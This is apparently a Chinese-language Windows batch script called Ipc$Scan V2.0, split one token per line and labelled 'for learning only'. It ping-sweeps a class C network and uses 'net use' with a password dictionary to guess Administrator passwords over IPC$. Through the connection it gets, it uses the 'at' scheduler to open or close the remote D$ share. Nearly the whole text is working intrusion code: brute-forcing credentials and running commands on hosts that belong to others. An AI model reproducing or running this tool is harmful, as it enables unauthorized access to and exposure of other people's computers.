用批处理写的一个Ipc$扫描器(Ipc$Scan V2.0.bat)
用批处理写的一个Ipc$扫描器(Ipc$Scan V2.0.bat),仅供学习!
@ECHO
OFF
setlocal
title Ipc
$
Scan V2
.
0
::
:::::::::::::::::::::::::主菜单:::::::::::::::::::::::
:MENU
COLOR 8A
set
op
=
""
CLS
rem
echo.输出空行,即相当于输入一个回车
ECHO
.
ECHO
.
ECHO
.
ECHO
.
"
Ipc$Scan V2.0
"
欢迎您的使用!
ECHO
.
CODE BY t0nsha@
070324
ECHO
.
主菜单:
ECHO
.
【
1
】Ping探测一个C类网段;
ECHO
.
【
2
】
Net
Use猜解主机密码建立IPC
$
连接;
ECHO
.
【
3
】At尝试开启目标共享(与2连用);
ECHO
.
【
4
】At关闭目标共享(与2连用);
ECHO
.
【About】关于此程序;
ECHO
.
【Quit】退出。
ECHO
.
set
/
p op
=
请选择服务项目的数字号并回车[
1234
]:
if
%op%
==
""
goto
error
rem
第一个选项具有默认选项的功能!
if
%op%
==
1
goto
op1
if
%op%
==
2
goto
op2
if
%op%
==
3
goto
op3
if
%op%
==
4
goto
op4
if
"
%op%
"
==
"
a
"
goto
about
if
"
%op%
"
==
"
q
"
goto
quit
:op1
set
/
p netid
=
请输入一个C类网段(如:
192.168
.
1
):
echo
%netid%网段的主机存活情况如下:
>
alive
.
txt
for
/
L %%A in
(
1
,
1
,
254
)
do
call
:ping
%netid% %%A
:ping
(
ping -n
1
%1
.
%2
|
find
"
from
"
)
&&
echo
%1
.
%2
>>
alive
.
txt
if
%2
==
5
cls
&
type
alive
.
txt &
pause
&
goto
:menu
:op2
if
not
exist
"
pass.txt
"
goto
:nopass
if
exist
"
pass.txt
"
goto
:nocreate
:nopass
echo
当前目录下没有密码文件(pass
.
txt),
set
/
p createpass
=
是否建立默认密码文件(YN):
if
%createpass%
==
Y
goto
:create
if
%createpass%
==
N
goto
:nocreate
:create
echo
;
密码字典,每行前带分号的为注释行!
>
pass
.
txt
echo
;
空密码为两个引号,即:
""
>>
pass
.
txt
echo
;
带空格的密码必须用双引号括起来,如:
"
test test
"
>>
pass
.
txt
echo
""
>>
pass
.
txt
:nocreate
set
/
p ip
=
请输入一个IP地址(如:
192.168
.
1.1
):
set
user
=
"
administrator
"
set
/
p user
=
请输入尝试猜解的用户名(默认为Administrator):
for
/
F %%B in
(
pass
.
txt
)
do
call
:netuse
%ip% %%B %user%
:netuse
(
net
use
/
%1
ipc
$
%2
/
user:
%3
|
find
"
成功
"
)
&&
echo
主机
%1
上%user%的密码是:
%2
,
已成功与
%1
建立连接!&
pause
&
goto
:menu
:op3
echo
此项应与第二项配对使用,即先用2建立连接后再运行本项!
net
time
/
%ip%
::
for /F "eol=; tokens=4,5 delims=: " %C in ('net time ^^.25.90.5') do echo %C %D
for
/
F
"
eol=; tokens=4,5 delims=:
"
%%C in
(
'
net
time
^
^
%ip%'
)
do
Call
:settime
%%C %%D
:settime
set
hour
=
%1
&
set
min
=
%2
::
at /222.25.90.5 20:43 net share d$=d:
set
/
a newmin
=
%min%
+
2
::
echo %hour:~0,2%:%newmin%
at
/
%ip% %hour:~
0
,
2
%:%newmin%
net
share d
$=
d:|
find
"
成功
"
&&
echo
主机%ip%将在%hour:~
0
,
2
%:%newmin%开启D盘共享!&&
pause
&&
goto
:menu
echo
失败!&
pause
&
goto
:menu
:op4
echo
此项应与第二项配对使用,即先用2建立连接后再运行本项!
net
time
/
%ip%
::
for /F "eol=; tokens=4,5 delims=: " %C in ('net time ^^.25.90.5') do echo %C %D
for
/
F
"
eol=; tokens=4,5 delims=:
"
%%C in
(
'
net
time
^
^
%ip%'
)
do
Call
:settime
%%C %%D
:settime
set
hour
=
%1
&
set
min
=
%2
::
at /222.25.90.5 20:43 net share d$=d:
set
/
a newmin
=
%min%
+
2
::
echo %hour:~0,2%:%newmin%
at
/
%ip% %hour:~
0
,
2
%:%newmin%
net
share d
$
/
del
|
find
"
成功
"
&&
net
use
/
%ip%
ipc
$
/
del
&&
echo
主机%ip%将在%hour:~
0
,
2
%:%newmin%关闭D盘共享!&&
pause
&&
goto
:menu
echo
失败!&
pause
&
goto
:menu
:about
cls
echo
.
echo
★★★★★★★★★★★★★★★★★★★★★★★★★★★
echo
★ 关于 ★
echo
.
★ ★
echo
★如有任何建议或Bug请Email至:liaodunxia@gmail
.
com ★
echo
.
★ ★
echo
★ ★
echo
★ ◎退出请直接关闭窗口◎ ★
echo
★★★★★★★★★★★★★★★★★★★★★★★★★★★
echo
.
call
:website
:website
setlocal
enabledelayedexpansion
set
website
=
欢迎访问我的博客:http:
//
blog
.
csdn
.
net
/
t0nsha的BLOG
:website2
for
/
l %%i in
(
0
,
1
,
45
)
do
call
:website1
%%i
if
%a% equ
45
goto
:about
goto
:website2
:website1
set
/
a a
=
%1
set
/
p
=
!website:~%a%
,
1
!
<
nulping
/
n
1
127.1
>
nul
goto
:eof
:quit
cls
echo
.
echo
.
echo
.
echo
----------
echo
§谢谢使用!再见!§
echo
----------
echo
on
&
endlocal
& ping -n
1
127.1
>
nul &
goto
:eof